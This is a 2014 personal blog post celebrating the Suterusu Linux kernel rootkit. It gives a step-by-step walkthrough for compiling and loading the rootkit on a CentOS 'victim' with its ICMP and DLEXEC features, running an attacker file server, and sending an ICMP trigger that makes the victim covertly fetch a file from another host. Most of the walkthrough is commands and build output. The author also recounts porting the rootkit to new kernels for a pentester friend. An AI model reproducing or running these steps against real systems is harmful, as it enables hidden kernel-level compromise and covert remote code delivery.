Sunday, August 10, 2014

An awesome linux kernel rootkit: Suterusu


I've been fuc*ing busy since I left SuSE about two months ago. I have a lot of time to hack/learn anything I want. Well, rootkit is one of my TODO things, as always. I wrote a dumb rootkit a half year ago. It's using an old good method to hiding file: hijack some syscalls. There's a better solution called "inline hook". Suterusu is the one implemented a inline hook framework. I don't want to explain the detail of how Suterusu was implemented. Cuz' no one( in the most cases) would do the job better than the original author: Michael Coppola already wrote a good article "Suterusu Rootkit: Inline Kernel Function Hooking on x86 and ARM".

I always want to make some open source rootkits work on the latest version of GNU/Linux. Damn...I'd be exhausted if I really do that. There are bunch of rootkits( adore-ng, ddrk, kbeast-v1, wnps, etc) out there and out-of-dated for years. Although you might find some "modern" ones like maK_it, kernel-rootkit-2.6.32, etc...but..there's always a annoying "but"...these rootkits are either lacking of inline hook framework or can't support a diverse linux kernel versions. I've test Suru on a dozen of different linux kernels, from 2.6.35 to 3.13.1. Now I'm going to share two stories of mine( of course, it's Sur-related;-)):

1, A friend asked for advice about rootkit selection, of course I'd never hesitate to tell him to use Suru. When he tried to use it, he found out he couldn't compile it on kernel-3.14.1. Then I modified a few lines of code and then it works.

2, Another friend( a pentester) asked me if I can make any rootkit work on CentOS 6.5 with 2.6.32-431.el6 x86_64. I tried Suru and found out it was not support 2.6.32 yet. Then I've add less than 100 LOC and then it works.

Suru is an awesome rootkit. I'm sure a lot of people are using it. Today I found out two features of Suru called "ICMP" and "DLEXEC" that I never look into it. A friend( still that pentester) told me it can be used as a covert channel to transfer files. I write a triggering program that could craft a specific ICMP header/payload and send it to the "victim server". When the victim receives the packet, it will download a file from a specific server.

---------------------------------------------------------------------
1. Download the Suterusu for both "victim" and "attacker".

2. The victim is using CentOS 6.5:
root@centos-rktesting ~]# uname -r
2.6.32-431.el6.x86_64


2.1 Install some necessary packages:
yum install -y kernel-devel.x86_64 gcc vim

2.2 Compile & load the rootkit:
[root@centos-rktesting suterusu]# make linux-x86_64 KDIR=/usr/src/kernels/2.6.32-431.23.3.el6.x86_64/ ICMP=y DLEXEC=y
make ARCH=x86_64 EXTRA_CFLAGS="-D_CONFIG_X86_64_ -D_CONFIG_DLEXEC_ -D_CONFIG_ICMP_" -C /usr/src/kernels/2.6.32-431.23.3.el6.x86_64/ M=/root/suterusu modules
make[1]: Entering directory `/usr/src/kernels/2.6.32-431.23.3.el6.x86_64'
  CC [M]  /root/suterusu/main.o
  CC [M]  /root/suterusu/util.o
  CC [M]  /root/suterusu/module.o
  CC [M]  /root/suterusu/dlexec.o
  CC [M]  /root/suterusu/icmp.o
  LD [M]  /root/suterusu/suterusu.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /root/suterusu/suterusu.mod.o
  LD [M]  /root/suterusu/suterusu.ko.unsigned
  NO SIGN [M] /root/suterusu/suterusu.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.32-431.23.3.el6.x86_64'

[root@centos-rktesting suterusu]# insmod suterusu.ko
 

3. The attacker can use anything GNU/Linux distro as you want, compile the file server and designate the file you want it to be transferred:
shawn@shawn-fortress /tmp/suterusu $ sudo ./a.out 8556 README.md
Bound to port 8556, waiting for connection...


3.1 Open a new terminal:
shawn@shawn-fortress /tmp/suterusu $ cd test/
shawn@shawn-fortress /tmp/suterusu/test $ ls
trigger_icmp_covert.py
shawn@shawn-fortress /tmp/suterusu/test $ ./trigger_icmp_covert.py


 4. Go to the victim's machine, check:
[root@centos-rktesting ~]# cat /root/.tmp
Suterusu
========

Typical compilation steps:

...........................................................
.................................................................

---------------------------------------------------------------------

That's it! Show time is over! It's quite simple, ah? I really appreciate Michael Coppola released Suterusu under free/open source software license. And I also thank him brings us good writings;-)

btw: What next? I probably go to try some memory forensics, to see if I could hunt some rootkits;-)

Have fun & good hunting!!!

May the L0rd's hacking spirit guide us!!!

Further readings:
[1] RFC-792
http://tools.ietf.org/html/rfc792

[2] Python documentation:
https://docs.python.org/2/library/struct.html

[3] TCP/IP protocols
http://www.protocols.com/pbook/tcpip3.htm

[4] Sock-RAW
http://sock-raw.org/papers/sock_raw